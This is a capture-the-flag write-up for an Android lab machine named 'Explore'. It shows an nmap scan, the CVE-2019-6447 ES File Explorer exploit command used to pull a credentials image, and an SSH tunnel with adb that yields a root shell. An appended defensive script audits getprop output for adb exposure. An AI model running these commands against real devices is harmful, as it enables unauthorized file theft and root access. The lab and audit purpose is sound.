Explore
Personal Rating: Easy
Enumeration
Starting with an nmap scan, some very interesting results can be seen:
sudo nmap -Pn -sV -p- 10.10.10.247
PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
5555/tcp  filtered freeciv
42135/tcp open     http    ES File Explorer Name Response httpd
43705/tcp open     unknown
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
http://10.10.10.247:59777/ #Forbidden: No dirlisting
ES File Explorer Exploit
The machine seems to be an Android device. Investigating the ES File Explorer service further turns out to be promising. I found an exploit script on Exploit-DB:
==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================
python3 ES-File-exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg
The shell was executed as 'u0_a76', but the image contained the credentials for the user kristi.
ADB Debug Shell
For root, I had some help from a friend who is more proficient in Android hacking.
I started an ssh shell from my machine and used adb to start a debug shell:
ssh kristi@<TARGETIP> -p 2222 -L 5555:localhost:5555
adb devices
emulator-5554 device
adb shell
The debug shell was running with root permissions.
This is unusual 'in the wild' as adb debugging would have to be activated on the device, which is uncommon and not default.
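To check a device you administer for the configuration seen here (adbd reachable over TCP and handing out a root shell), the following added example, which is not part of the original write-up, audits the output of `getprop`. The sample dump is constructed, the function names are hypothetical, and the root and authorization checks are a simplified model of how adbd reads these properties.

```python
import re

# Constructed sample of `getprop` output; values are illustrative only.
SAMPLE_GETPROP = """\
[ro.build.type]: [userdebug]
[ro.debuggable]: [1]
[ro.secure]: [0]
[ro.adb.secure]: [0]
[service.adb.tcp.port]: [5555]
[persist.adb.tcp.port]: []
"""

PROP_LINE = re.compile(r"^\[([^\]]+)\]:\s*\[(.*)\]\s*$")


def parse_getprop(text):
    """Turn `[key]: [value]` lines into a dict, skipping malformed lines."""
    props = {}
    for line in text.splitlines():
        m = PROP_LINE.match(line.strip())
        if m:
            props[m.group(1)] = m.group(2)
    return props


def tcp_port(props):
    """Port adbd would listen on, or None. The service.* value wins if set."""
    value = props.get("service.adb.tcp.port") or props.get("persist.adb.tcp.port", "")
    return int(value) if value.isdigit() and int(value) > 0 else None


def audit_adb(props):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    port = tcp_port(props)
    if port is not None:
        findings.append(f"adbd listens on TCP port {port}")
    # Assumption (simplified): adbd keeps root when ro.secure=0, or after
    # `adb root` (service.adb.root=1) on a debuggable build.
    debuggable = props.get("ro.debuggable") == "1"
    if props.get("ro.secure") == "0" or (debuggable and props.get("service.adb.root") == "1"):
        findings.append("adb shell runs as root")
    if debuggable and props.get("ro.adb.secure", "0") != "1":
        findings.append("adb host key authorization is not enforced")
    return findings


if __name__ == "__main__":
    for finding in audit_adb(parse_getprop(SAMPLE_GETPROP)):
        print("[!]", finding)
```

A port that is filtered from the network, as 5555 was in the scan above, does not clear the first finding: any local user or forwarded connection can still reach the listener.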